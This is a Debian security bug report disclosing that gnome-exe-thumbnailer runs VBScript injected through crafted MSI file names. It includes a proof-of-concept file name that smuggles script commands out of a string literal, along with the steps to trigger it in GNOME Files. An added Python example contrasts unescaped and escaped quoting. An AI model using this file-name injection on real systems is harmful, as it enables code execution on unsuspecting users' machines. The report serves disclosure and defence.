[Secure-testing-team] Bug#868705: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript
Nils Dagsson Moskopp
nils+debian-reportbug at dieweltistgarnichtso.net
Mon Jul 17 21:01:42 UTC 2017
Package: gnome-exe-thumbnailer
Version: 0.9.4-2
Severity: grave
Tags: security
Justification: user security hole
Dear Maintainer,
the following PoC is copied verbatim from my post about the parsing issue:
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
Proof of Concept

Install Dependencies

On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.

Create MSI Files

Create a file named poc.xml with the following content:

    <?xml version="1.0" encoding="utf-8"?>
    <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
      <Product Version="1.0"/>
    </Wix>

Execute the following Bourne Shell code:

    wixl -o poc.msi poc.xml
    cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
-- System Information:
Debian Release: 9.0
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages gnome-exe-thumbnailer depends on:
ii icoutils 0.31.2-1.1
ii imagemagick 8:6.9.7.4+dfsg-11
ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
ii libglib2.0-bin 2.50.3-2
Versions of packages gnome-exe-thumbnailer recommends:
pn wine <none>
pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
gnome-exe-thumbnailer suggests no packages.
-- no debconf information
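
The shape of the PoC file name (a closing quote, `:` statement separators, a trailing `'` comment) points at a file name being pasted into a VBScript string literal. The following is an added example, not code from the report or from gnome-exe-thumbnailer: the report does not show the thumbnailer's script, so `TEMPLATE` and all function names are hypothetical. It compares the unescaped pattern with a quoted one and counts the statements that result.

```python
# Added example. TEMPLATE is constructed; the thumbnailer's real script is not in the report.
TEMPLATE = 'Call Inspect("{name}", 0)'

# File name from the report's PoC, as it exists on disk after the shell drops the backslashes.
POC_NAME = ('poc.msi",0):Set fso=CreateObject("Scripting.FileSystemObject")'
            ':Set poc=fso.CreateTextFile("badtaste.txt")\'.msi')


def naive_script(name: str) -> str:
    """Vulnerable pattern: the file name is pasted into script source as-is."""
    return TEMPLATE.format(name=name)


def vbs_literal(name: str) -> str:
    """Return the inside of a VBScript string literal holding exactly `name`."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in name):
        # A VBScript literal cannot span lines; refuse instead of guessing.
        raise ValueError("control character in file name")
    return name.replace('"', '""')  # VBScript escapes a quote by doubling it


def hardened_script(name: str) -> str:
    """Same template, but the name can no longer leave the string literal."""
    return TEMPLATE.format(name=vbs_literal(name))


def count_statements(line: str) -> int:
    """Count ':'-separated statements on one line, skipping strings and comments."""
    count, in_string, i = 1, False, 0
    while i < len(line):
        ch = line[i]
        if in_string:
            if ch == '"':
                if line[i + 1:i + 2] == '"':
                    i += 1          # doubled quote: still inside the string
                else:
                    in_string = False
        elif ch == '"':
            in_string = True
        elif ch == "'":
            break                   # rest of the line is a comment
        elif ch == ":":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    for build in (naive_script, hardened_script):
        print(build.__name__, count_statements(build(POC_NAME)))
```

Handing the file name to the script as an argument rather than embedding it in the source avoids the quoting problem altogether.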